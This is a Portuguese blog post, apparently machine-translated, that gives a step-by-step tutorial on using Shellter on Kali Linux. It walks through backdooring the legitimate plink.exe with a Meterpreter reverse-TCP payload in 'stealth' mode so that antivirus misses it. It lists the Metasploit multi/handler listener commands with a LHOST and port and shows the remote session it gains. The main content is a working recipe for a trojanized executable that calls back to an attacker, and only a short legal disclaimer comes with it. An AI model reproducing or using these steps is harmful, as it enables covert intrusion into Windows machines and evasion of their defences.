Bypass Anti-Virus com Shellter 5.1 no Linux Kali


Tendo problemas para obter uma shell Meterpreter passado que AV traquinas? Confira o novo 5.1 Shellter ferramenta de injeção de shellcode! A última versão do Shellter para pentesters inclui um modo "stealth" que mantém a funcionalidade do programa host original.
Shellter trabalha levando um arquivo .exe legítimo do Windows, acrescenta o código shell para ele e, em seguida, faz um ótimo trabalho de modificar o arquivo para o desvio AV. Modo automático do programa faz todo o processo muito livre de dor. 
A nova versão do Shellter não está incluído nos repositórios ainda, então se você quiser a versão mais recente você precisará baixar o arquivo zip e instalá-lo manualmente.

Então, chega de conversa, vamos vê-lo em ação!

(Nota: Como sempre, nunca tente acessar um sistema que você não tem permissão expressa por escrito para fazê-lo Fazer isso é ilegal e você pode acabar na cadeia..)
1. Baixe e instale "shellter" (https://www.shellterproject.com/download/)
Salvei a pasta extraída para a pasta / root / Desktop. Você terá que tornar o arquivo executável shellter.exe com o comando chmod.
2. Grab "plink.exe" a partir do diretório de Kali 'usr/share/windows-binaries' e copiá-lo para o diretório Shellter.
3. Mude para o diretório "/root/Desktop/shellter '.
4. Start Shellter – type, “wine shellter.exe
Shellter Kali 1
5. Digite "A" para automático
6. No Alvo PE Prompt, digite "plink.exe"
7. Quando solicitado para habilitar o modo furtivo digite "Y":
Shellter Kali 2
Esta nova funcionalidade permite que o arquivo para backdoored ainda funcionam como arquivo originalmente. Uma grande ajuda para pentesters Red equipe.
8. Quando solicitado para Payloads selecionar "L" e "1" para Meterpreter_Reverse_TCP.
9. Digite seu endereço de IP para Kali LHOST.
10. Digite uma porta para usar (eu usei 4545)
Shellter Kali 3
Shellter, então, adicionar código polimórfico e Ofuscação o arquivo. Quando terminar, você verá:
Shellter Kali 4
Você terá agora um "plink.exe '(o arquivo shellcoded) e' plink.exe.bak '(o arquivo original) no diretório Shellter.
11. Agora, precisamos iniciar um serviço de escuta no sistema Kali usando as mesmas configurações de cima:
  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.39
  • set lport 4545
  • exploit
Shellter Kali 5
12. Copie o arquivo 'plink.exe' para o sistema Windows:
Shellter Kali 6
13. Agora, no Windows, se você executar plink.exe partir da linha de comando:
Shellter Kali 7
Ele lista as informações de ajuda para o arquivo, mas não acionar o shell remoto ainda. Mas se nós realmente usar plink se conectar a outro sistema (a Pi Raspberry) como visto abaixo:
Shellter Kali 8
Observe que o prompt de login ssh Raspberry Pi através Plink, mas também temos uma sessão remota para a caixa do Windows:
Shellter Kali 9
Nós podemos correr "sysinfo" para visualizar informações sobre o computador:
Shellter Kali 10
Sucesso!
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...